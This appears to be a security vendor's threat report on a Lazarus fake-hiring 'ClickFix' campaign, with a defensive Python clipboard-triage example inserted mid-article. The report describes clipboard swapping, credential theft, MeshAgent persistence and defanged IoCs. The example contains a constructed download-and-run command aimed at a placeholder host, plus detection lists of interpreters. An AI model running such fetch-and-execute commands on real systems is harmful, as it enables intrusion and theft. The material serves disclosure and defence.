Research

Lazarus’ latest tactics: Deceptive development and ClickFix

We traced a deceptive hiring assessment scam back to Lazarus, and here’s how they use psychology and obfuscation to bypass defenses
Alexandru-Cristian Bardaș
Threat Analysis Engineer
Published
July 22, 2025
Read time
4 Minutes

    While conducting routine clipboard monitoring, our team uncovered a sophisticated attack chain masquerading as an official NVIDIA-related update. What initially appeared to be a hiring assessment challenge quickly revealed itself to be a cleverly disguised lure. 

    The deceptive journey 

    The attack begins with a prompt to complete a mock interview form, followed by a page instructing users to set up their camera. This page falsely claims there are issues with the user's webcam or microphone, adding a layer of urgency and credibility to the ruse.

    A pop-up then urges users to “Request camera access,” which presents a seemingly legitimate update command referencing an NVIDIA domain, supposedly so the user can fix the reported issues.

    However, what lands on the clipboard is not the command shown on screen: once copied, it morphs into a malicious payload. 
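As an added example (not code from the article or its author), these are the two checks a clipboard monitor can run on text the user just copied: whether it differs from the command the page displayed, and whether it looks like a download-and-run one-liner that fetches from a domain other than the brand it claims. The interpreter list, regexes and sample strings are assumptions constructed for illustration.

```python
"""Clipboard triage for ClickFix-style lures (added example, not from the
article). Checks copied text against what the page displayed and scores it as
a paste-to-run one-liner. All sample strings are constructed."""
import re

# Interpreters and download helpers commonly chained in paste-to-run lures.
# Assumption: extend this set for your own environment.
INTERPRETERS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh",
                "cscript", "wscript", "mshta", "curl", "certutil", "bitsadmin"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
HIDE_RE = re.compile(r"(-w(indowstyle)?\s+hidden|/b\b|-enc(odedcommand)?\b)", re.I)


def _normalize(text: str) -> str:
    return " ".join(text.split())


def clipboard_mismatch(displayed: str, copied: str) -> bool:
    """True when the copied text is not the command the page showed the user."""
    return _normalize(displayed) != _normalize(copied)


def score_clipboard_text(text: str, expected_domains=()) -> list:
    """Return the reasons the text looks like a paste-to-run lure (empty = clean)."""
    reasons = []
    tokens = {t.lower().strip("\"'") for t in re.split(r"[\s|&;()]+", text)}
    if tokens & INTERPRETERS:
        reasons.append("interpreter")
    hosts = [h.lower() for h in URL_RE.findall(text)]
    if hosts:
        reasons.append("url")
        # The lure shows one brand (here an NVIDIA domain) but fetches elsewhere.
        if expected_domains and not all(
                any(h == d or h.endswith("." + d) for d in expected_domains)
                for h in hosts):
            reasons.append("unexpected-domain")
    if HIDE_RE.search(text):
        reasons.append("hidden-execution")
    if "interpreter" in reasons and re.search(r"&&|\|\||;|\|", text):
        reasons.append("chained-execution")
    return reasons


# Constructed samples: what the lure displays vs. what the clipboard receives.
DISPLAYED = "nvidia-update --check-camera"
COPIED = ("cmd /c curl -s https://example.invalid/update.zip -o %TEMP%\\u.zip "
          "&& cscript //b %TEMP%\\update.vbs")

if __name__ == "__main__":
    print("mismatch:", clipboard_mismatch(DISPLAYED, COPIED))
    print("reasons:", score_clipboard_text(COPIED, expected_domains=("nvidia.com",)))
```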

    The attack chain 

    Executing the command initiates a multi-stage attack: 

    • A malicious archive is downloaded and automatically extracted.
    • A VBS script from the archive launches a Python environment embedded within it, posing as a legitimate driver update process. It displays verbose output to further trick the user.
    • The Python script itself is heavily obfuscated and aligns with known tactics used by the Lazarus APT group. 

    Upon deobfuscation, the script reveals five major functionalities: 

    1. Credential Theft: WebBrowserPassView is downloaded, decrypted and executed to extract browser-related credentials. Those credentials, together with system information, are exfiltrated to the command-and-control (C2) server.
    2. Credential Theft: MailPassView is downloaded, decrypted and run to harvest email credentials, which are also sent to the C2.
    3. Remote Access: An instance of MeshAgent is silently installed, providing the attackers with persistent remote control over the infected system.
    4. Advanced Data Theft and Remote Access: A PyInstaller EXE enables file and secret extraction via FTP. Persistence is achieved through a scheduled task disguised as ChromeUpdate.exe, placed within the legitimate Chrome directory to avoid suspicion.
    5. Cryptocurrency Targeting: Browser extensions and local folders related to cryptocurrencies are harvested and sent to the C2. 

    Attribution and implications 

    The attack’s complexity and methodology, paired with the initial lure and code similarities throughout the Python scripts, strongly suggest Lazarus’ involvement. This campaign reflects the group’s evolving tactics under the DeceptiveDevelopment umbrella, combining psychological manipulation with technical sophistication to bypass defenses and exploit trust. 

    Indicators of Compromise (IoCs) 

    Assessment URL: hxxps[://]assessdome[.]com/invite/7e462f3c/8002565804 

    C2: metakenproxy[.]com:81 

    Initial VBS script (SHA256): 7013822c0a794712c5fe8f62c126e5992dca4a744882a039040569ae4ec1a868 

    Initial Python script (SHA256): 03ad194456951695eb4d4ceb40d9e52aaadbc9a4f4b8b1d020077115103e5359 

    WebBrowserPassView (SHA256): 36541fad68e79cdedb965b1afcdc45385646611aa72903ddbe9d4d064d7bffb9 

    MailPassView (SHA256): bc7bd27e94e24a301edb3d3e7fad982225ac59430fc476bda4e1459faa1c1647 

    MeshAgent (SHA256): 9757780860ec5637c412a8756f25c56f7d1d89358e447782164ba418def1c64e 

    ChromeUpdate.exe (SHA256): 00bef70cd031a830f2ee1ec4ce750947a9c8838995289ecbb253426cca53d046 
